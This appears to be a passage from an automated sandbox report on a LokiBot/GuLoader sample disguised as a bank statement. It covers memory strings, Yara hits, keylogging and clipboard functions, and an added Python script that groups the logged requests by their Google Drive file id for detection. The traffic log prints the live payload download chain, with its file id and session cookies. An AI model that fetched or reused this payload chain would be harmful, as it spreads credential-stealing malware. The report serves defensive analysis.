Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81578179889.0000000000A10000.00000004.00000020.sdmp String found in binary or memory: https://doc-0k-48-docs.googleusercontent.com/%%doc-0k-48-docs.googleusercontent.com
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81578885460.0000000000A95000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000003.81572159339.0000000000A92000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000003.81571978022.0000000000A86000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000003.81574632157.0000000000A95000.00000004.00000001.sdmp String found in binary or memory: https://doc-0k-48-docs.googleusercontent.com/3
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81578179889.0000000000A10000.00000004.00000020.sdmp String found in binary or memory: https://doc-0k-48-docs.googleusercontent.com/Od
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000003.81643405594.0000000000741000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81651025400.0000000000698000.00000004.00000020.sdmp String found in binary or memory: https://doc-0k-48-docs.googleusercontent.com/docs/securesc/35sumvj0vue2ri2uv2ecasddg28mcdkj/ad6glr8l
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81499259133.00000000008DC000.00000004.00000020.sdmp String found in binary or memory: https://doc-0k-48-docs.googleusercontent.com/qr
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81488930602.0000000000955000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81495319894.0000000000955000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81500013187.0000000000955000.00000004.00000020.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81491679427.0000000000955000.00000004.00000001.sdmp String found in binary or memory: https://doc-0k-48-docs.googleusercontent.com/v
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000003.81646618008.0000000000741000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81652133637.0000000000741000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000003.81648906007.0000000000741000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000003.81643405594.0000000000741000.00000004.00000001.sdmp String found in binary or memory: https://doc-0k-48-docs.googleusercontent.com/~
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81499259133.00000000008DC000.00000004.00000020.sdmp String found in binary or memory: https://docs.google.com/:5
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81499259133.00000000008DC000.00000004.00000020.sdmp String found in binary or memory: https://docs.google.com/b5
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81488930602.0000000000955000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81489163627.000000000096F000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81495319894.0000000000955000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81500013187.0000000000955000.00000004.00000020.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81491294279.000000000096E000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81488546638.000000000093B000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81491679427.0000000000955000.00000004.00000001.sdmp String found in binary or memory: https://docs.google.com/nonceSigner?nonce=1h1o0go4qslkm&continue=https://doc-0k-48-docs.googleuserco
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81651530540.00000000006E0000.00000004.00000020.sdmp String found in binary or memory: https://drive.google.com/
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81499259133.00000000008DC000.00000004.00000020.sdmp String found in binary or memory: https://drive.google.com/0By
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81578179889.0000000000A10000.00000004.00000020.sdmp String found in binary or memory: https://drive.google.com/F
Source: Statement from QNB.exe, 00000004.00000002.81017233540.00000000007F8000.00000004.00000020.sdmp String found in binary or memory: https://drive.google.com/J
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81499259133.00000000008DC000.00000004.00000020.sdmp String found in binary or memory: https://drive.google.com/J4
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81578179889.0000000000A10000.00000004.00000020.sdmp String found in binary or memory: https://drive.google.com/M
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81651530540.00000000006E0000.00000004.00000020.sdmp String found in binary or memory: https://drive.google.com/T
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81653026045.0000000002400000.00000004.00000001.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNp
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000003.81643405594.0000000000741000.00000004.00000001.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNpq
Source: Statement from QNB.exe, 00000004.00000003.80961592797.0000000000875000.00000004.00000001.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNprezy-qH_LiFQvT2qU
Source: Statement from QNB.exe, 00000004.00000002.81017793700.0000000000842000.00000004.00000020.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNptsv
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81651299450.00000000006C3000.00000004.00000020.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNpu
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81651530540.00000000006E0000.00000004.00000020.sdmp String found in binary or memory: https://drive.google.com/~
Source: iexplore.exe, 00000011.00000002.81169528331.00000000030FA000.00000004.00000001.sdmp, iexplore.exe, 00000011.00000002.81169483229.00000000030F5000.00000004.00000001.sdmp, iexplore.exe, 00000011.00000002.81170899396.000000000377E000.00000004.00000001.sdmp, iexplore.exe, 00000011.00000003.81166049858.0000000003787000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com/
Source: iexplore.exe, 00000011.00000002.81170899396.000000000377E000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com//
Source: iexplore.exe, 00000011.00000002.81170899396.000000000377E000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com/v104
Source: iexplore.exe String found in binary or memory: https://login.yahoo.com/config/login
Source: iexplore.exe, iexplore.exe, 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp String found in binary or memory: https://www.google.com
Source: iexplore.exe String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: unknown DNS traffic detected: queries for: drive.google.com
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNp HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
    Host: drive.google.com
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/9ika2j8t7trtq51k7nrgujctt9nrsl81/1637759700000/06007705055686197661/*/1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNp?e=download HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
    Cache-Control: no-cache
    Host: doc-00-5k-docs.googleusercontent.com
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNp HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
    Host: drive.google.com
    Cache-Control: no-cache
    Cookie: NID=511=O8F3WUMpwif_uSvF6NVaoDKCa_B9CVpm3RXpohb-m11hovINlL1qeTsu5byj3kjM026Fjm16vkT9stNprKGWMAzUEBJm3mx3WCYZd3mzWhQ3jL6jz3aEfmVjjbe86H1cSaC9AsZUEFRORqAQuyo3SOepEKrezy-qH_LiFQvT2qU
Source: global traffic HTTP traffic detected: GET /docs/securesc/35sumvj0vue2ri2uv2ecasddg28mcdkj/ad6glr8l0h99hqpngtfni6a8i22nv65q/1637759775000/06007705055686197661/09438607504833105235Z/1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNp?e=download HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
    Cache-Control: no-cache
    Host: doc-0k-48-docs.googleusercontent.com
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /nonceSigner?nonce=1h1o0go4qslkm&continue=https://doc-0k-48-docs.googleusercontent.com/docs/securesc/35sumvj0vue2ri2uv2ecasddg28mcdkj/ad6glr8l0h99hqpngtfni6a8i22nv65q/1637759775000/06007705055686197661/09438607504833105235Z/1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNp?e%3Ddownload&hash=pckr7av56kdraffkce6aepv1b87ssmgu HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
    Cache-Control: no-cache
    Connection: Keep-Alive
    Host: docs.google.com
    Cookie: NID=511=O8F3WUMpwif_uSvF6NVaoDKCa_B9CVpm3RXpohb-m11hovINlL1qeTsu5byj3kjM026Fjm16vkT9stNprKGWMAzUEBJm3mx3WCYZd3mzWhQ3jL6jz3aEfmVjjbe86H1cSaC9AsZUEFRORqAQuyo3SOepEKrezy-qH_LiFQvT2qU
Source: global traffic HTTP traffic detected: GET /docs/securesc/35sumvj0vue2ri2uv2ecasddg28mcdkj/ad6glr8l0h99hqpngtfni6a8i22nv65q/1637759775000/06007705055686197661/09438607504833105235Z/1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNp?e=download&nonce=1h1o0go4qslkm&user=09438607504833105235Z&hash=0o6b323c0rq74tch8ch7someetivr76b HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
    Cache-Control: no-cache
    Connection: Keep-Alive
    Host: doc-0k-48-docs.googleusercontent.com
    Cookie: AUTH_slujndimmid19jcuof4vvgvj59t5oehn_nonce=1h1o0go4qslkm
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNp HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
    Host: drive.google.com
    Cache-Control: no-cache
    Cookie: NID=511=O8F3WUMpwif_uSvF6NVaoDKCa_B9CVpm3RXpohb-m11hovINlL1qeTsu5byj3kjM026Fjm16vkT9stNprKGWMAzUEBJm3mx3WCYZd3mzWhQ3jL6jz3aEfmVjjbe86H1cSaC9AsZUEFRORqAQuyo3SOepEKrezy-qH_LiFQvT2qU
Source: global traffic HTTP traffic detected: GET /docs/securesc/35sumvj0vue2ri2uv2ecasddg28mcdkj/ad6glr8l0h99hqpngtfni6a8i22nv65q/1637759775000/06007705055686197661/09438607504833105235Z/1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNp?e=download HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
    Cache-Control: no-cache
    Host: doc-0k-48-docs.googleusercontent.com
    Connection: Keep-Alive
    Cookie: AUTH_slujndimmid19jcuof4vvgvj59t5oehn=09438607504833105235Z|1637759775000|us3t0nbh97o1s1g8jtgaiaegnreqqlkj
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNp HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
    Host: drive.google.com
    Cache-Control: no-cache
    Cookie: NID=511=O8F3WUMpwif_uSvF6NVaoDKCa_B9CVpm3RXpohb-m11hovINlL1qeTsu5byj3kjM026Fjm16vkT9stNprKGWMAzUEBJm3mx3WCYZd3mzWhQ3jL6jz3aEfmVjjbe86H1cSaC9AsZUEFRORqAQuyo3SOepEKrezy-qH_LiFQvT2qU
Source: global traffic HTTP traffic detected: GET /docs/securesc/35sumvj0vue2ri2uv2ecasddg28mcdkj/ad6glr8l0h99hqpngtfni6a8i22nv65q/1637759775000/06007705055686197661/09438607504833105235Z/1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNp?e=download HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
    Cache-Control: no-cache
    Host: doc-0k-48-docs.googleusercontent.com
    Connection: Keep-Alive
    Cookie: AUTH_slujndimmid19jcuof4vvgvj59t5oehn=09438607504833105235Z|1637759775000|us3t0nbh97o1s1g8jtgaiaegnreqqlkj
Source: unknown HTTPS traffic detected: 142.250.185.78:443 -> 192.168.11.20:49804 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.186.97:443 -> 192.168.11.20:49805 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.185.78:443 -> 192.168.11.20:49827 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.186.97:443 -> 192.168.11.20:49828 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.14:443 -> 192.168.11.20:49829 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.185.78:443 -> 192.168.11.20:49831 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.186.97:443 -> 192.168.11.20:49832 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.185.78:443 -> 192.168.11.20:49834 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.186.97:443 -> 192.168.11.20:49835 version: TLS 1.2
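The HTTP requests above are the GuLoader download chain: the same Google Drive file id is requested through /uc?export=download, bounced through docs.google.com/nonceSigner, and finally served from a doc-*-docs.googleusercontent.com content host, all with Cache-Control: no-cache and an IE11-on-Windows-7 user-agent. The Drive file id is the stable indicator across all of those hosts. The following is an added example, not code from Joe Sandbox or from this report: it parses raw HTTP requests, ties every request to the Drive file id it refers to, and scores the resulting chain. The sample requests are re-assembled from the report's GET lines (Cookie headers omitted); the stage names, the file-id regex and the scoring heuristics are the editor's assumptions, not Google's or Joe Sandbox's definitions.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed sample: five of the requests listed in the report, re-assembled as
# raw HTTP/1.1 requests (CRLF-separated headers, Cookie headers omitted).
SAMPLE_REQUESTS = [
    "GET /uc?export=download&id=1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNp HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\r\n"
    "Host: drive.google.com\r\nCache-Control: no-cache\r\n\r\n",
    "GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/9ika2j8t7trtq51k7nrgujctt9nrsl81/"
    "1637759700000/06007705055686197661/*/1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNp?e=download HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\r\n"
    "Cache-Control: no-cache\r\nHost: doc-00-5k-docs.googleusercontent.com\r\nConnection: Keep-Alive\r\n\r\n",
    "GET /nonceSigner?nonce=1h1o0go4qslkm&continue=https://doc-0k-48-docs.googleusercontent.com/docs/securesc/"
    "35sumvj0vue2ri2uv2ecasddg28mcdkj/ad6glr8l0h99hqpngtfni6a8i22nv65q/1637759775000/06007705055686197661/"
    "09438607504833105235Z/1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNp?e%3Ddownload&hash=pckr7av56kdraffkce6aepv1b87ssmgu HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\r\n"
    "Cache-Control: no-cache\r\nConnection: Keep-Alive\r\nHost: docs.google.com\r\n\r\n",
    "GET /docs/securesc/35sumvj0vue2ri2uv2ecasddg28mcdkj/ad6glr8l0h99hqpngtfni6a8i22nv65q/1637759775000/"
    "06007705055686197661/09438607504833105235Z/1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNp?e=download"
    "&nonce=1h1o0go4qslkm&user=09438607504833105235Z&hash=0o6b323c0rq74tch8ch7someetivr76b HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\r\n"
    "Cache-Control: no-cache\r\nConnection: Keep-Alive\r\nHost: doc-0k-48-docs.googleusercontent.com\r\n\r\n",
    "GET /uc?export=download&id=1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNp HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\r\n"
    "Host: drive.google.com\r\nCache-Control: no-cache\r\n\r\n",
]

# Assumption: Drive file ids are long base64url-like tokens.
DRIVE_FILE_ID = re.compile(r"^[A-Za-z0-9_-]{25,}$")


def parse_request(raw):
    """Split a raw HTTP/1.1 request into method, target and a lower-cased header dict."""
    head = raw.partition("\r\n\r\n")[0]
    lines = [ln for ln in head.split("\r\n") if ln]
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers}


def _id_from_securesc_path(path):
    """The last path segment of a /docs/securesc/... URL is the Drive file id."""
    if path.startswith("/docs/securesc/"):
        candidate = path.rsplit("/", 1)[-1]
        if DRIVE_FILE_ID.match(candidate):
            return candidate
    return None


def drive_stage(req):
    """Return (file_id, stage) when the request belongs to a Drive direct-download chain."""
    host = req["headers"].get("host", "").lower()
    url = urlsplit(req["target"])
    if host == "drive.google.com" and url.path == "/uc":
        qs = parse_qs(url.query)
        if qs.get("export") == ["download"] and qs.get("id"):
            return qs["id"][0], "direct-download-request"
    if host == "docs.google.com" and url.path == "/nonceSigner":
        # The continue= parameter carries the content-host URL (parse_qs unquotes %3D).
        cont = urlsplit(parse_qs(url.query).get("continue", [""])[0])
        if (cont.hostname or "").endswith(".googleusercontent.com"):
            fid = _id_from_securesc_path(cont.path)
            if fid:
                return fid, "nonce-redirect"
    if host.endswith(".googleusercontent.com"):
        fid = _id_from_securesc_path(url.path)
        if fid:
            return fid, "content-fetch"
    return None, None


def correlate(raw_requests):
    """Group requests by Drive file id, recording stages, hosts, user-agents and no-cache use."""
    chains = defaultdict(lambda: {"stages": [], "hosts": set(), "user_agents": set(), "no_cache": 0})
    for raw in raw_requests:
        req = parse_request(raw)
        fid, stage = drive_stage(req)
        if fid is None:
            continue
        chain = chains[fid]
        chain["stages"].append(stage)
        chain["hosts"].add(req["headers"].get("host", "").lower())
        chain["user_agents"].add(req["headers"].get("user-agent", ""))
        if req["headers"].get("cache-control", "").lower() == "no-cache":
            chain["no_cache"] += 1
    return dict(chains)


def assess_chain(chain):
    """Editor's heuristics for a downloader-style Drive fetch; each hit is one reason string."""
    reasons = []
    if "content-fetch" in chain["stages"]:
        reasons.append("payload body fetched from a googleusercontent.com content host")
    if chain["stages"].count("direct-download-request") >= 2:
        reasons.append("same file id requested repeatedly via /uc?export=download")
    if chain["no_cache"] == len(chain["stages"]):
        reasons.append("every request sent Cache-Control: no-cache (forces a fresh copy of the payload)")
    if any("Trident/7.0" in ua and "Windows NT 6.1" in ua for ua in chain["user_agents"]):
        reasons.append("claims IE11 on Windows 7; compare with the real OS and process in endpoint telemetry")
    return reasons


if __name__ == "__main__":
    for file_id, chain in correlate(SAMPLE_REQUESTS).items():
        print(file_id, sorted(chain["hosts"]), chain["stages"])
        for reason in assess_chain(chain):
            print("  -", reason)
```

Run against proxy or PCAP-derived request logs, the file id that falls out of correlate() is the indicator to block and hunt for; the hosts in the chain are all legitimate Google infrastructure and are not worth blocking on their own.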

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a raw input device (often for capturing keystrokes)
Source: Statement from QNB.exe, 00000004.00000003.81011749898.000000001F3B1000.00000004.00000001.sdmp Binary or memory string: RegisterRawInputDevices
Contains functionality to read data from the clipboard
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 14_2_0040BA30 GetTempPathA,GetWindowsDirectoryA,GetTempFileNameA,OpenClipboard,GetLastError,DeleteFileA, 14_2_0040BA30

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000004.00000003.81011749898.000000001F3B1000.00000004.00000001.sdmp, type: MEMORY Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Uses 32bit PE files
Source: Statement from QNB.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Yara signature match
Source: 00000004.00000003.81011749898.000000001F3B1000.00000004.00000001.sdmp, type: MEMORY Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Detected potential crypto function
Source: C:\Users\user\Desktop\Statement from QNB.exe Code function: 0_2_00401771 0_2_00401771
Source: C:\Users\user\Desktop\Statement from QNB.exe Code function: 0_2_00401724 0_2_00401724
Source: C:\Users\user\Desktop\Statement from QNB.exe Code function: 0_2_00401535 0_2_00401535
Source: C:\Users\user\Desktop\Statement from QNB.exe Code function: 0_2_022F3E05 0_2_022F3E05
Source: C:\Users\user\Desktop\Statement from QNB.exe Code function: 0_2_022FDA66 0_2_022FDA66
Source: C:\Users\user\Desktop\Statement from QNB.exe Code function: 0_2_0230697A 0_2_0230697A
Source: C:\Users\user\Desktop\Statement from QNB.exe Code function: 0_2_022FD382 0_2_022FD382
Source: C:\Users\user\Desktop\Statement from QNB.exe Code function: 0_2_022F9E10 0_2_022F9E10
Source: C:\Users\user\Desktop\Statement from QNB.exe Code function: 0_2_02302A7B 0_2_02302A7B
Source: C:\Users\user\Desktop\Statement from QNB.exe Code function: 0_2_023030BF 0_2_023030BF
Source: C:\Users\user\Desktop\Statement from QNB.exe Code function: 0_2_022F10DE 0_2_022F10DE
Source: C:\Users\user\Desktop\Statement from QNB.exe Code function: 0_2_022FA561 0_2_022FA561
Source: C:\Users\user\Desktop\Statement from QNB.exe Code function: 0_2_02304D65 0_2_02304D65
Source: C:\Users\user\Desktop\Statement from QNB.exe Code function: 0_2_022FE1B9 0_2_022FE1B9
Source: C:\Users\user\Desktop\Statement from QNB.exe Code function: 0_2_022FA1E8 0_2_022FA1E8
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 14_2_004050C2 14_2_004050C2
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 14_2_004014AB 14_2_004014AB
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 14_2_00405133 14_2_00405133
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 14_2_004051A4 14_2_004051A4
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 14_2_00401246 14_2_00401246
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 14_2_0040CA46 14_2_0040CA46
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 14_2_00405235 14_2_00405235
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 14_2_004032C8 14_2_004032C8
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 14_2_00401689 14_2_00401689
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 14_2_00402F60 14_2_00402F60
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 15_2_02BE3E05 15_2_02BE3E05
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 15_2_02BEDA66 15_2_02BEDA66
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 15_2_02BED382 15_2_02BED382
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 15_2_02BF697A 15_2_02BF697A
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 15_2_02BF30BF 15_2_02BF30BF
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 15_2_02BE10DE 15_2_02BE10DE
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 15_2_02BE9E10 15_2_02BE9E10
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 15_2_02BF2A7B 15_2_02BF2A7B
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 15_2_02BEE1B9 15_2_02BEE1B9
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 15_2_02BEA1E8 15_2_02BEA1E8
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 15_2_02BF4D65 15_2_02BF4D65
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 15_2_02BEA561 15_2_02BEA561
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 16_2_00404DDB 16_2_00404DDB
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 16_2_0040BD8A 16_2_0040BD8A
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 16_2_00404E4C 16_2_00404E4C
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 16_2_00404EBD 16_2_00404EBD
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 16_2_00404F4E 16_2_00404F4E
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 17_2_0043407F 17_2_0043407F
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 17_2_0043A284 17_2_0043A284
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 17_2_0043E3BA 17_2_0043E3BA
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 17_2_00404407 17_2_00404407
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 17_2_00404504 17_2_00404504
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 17_2_0041286D 17_2_0041286D
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 17_2_00405D08 17_2_00405D08
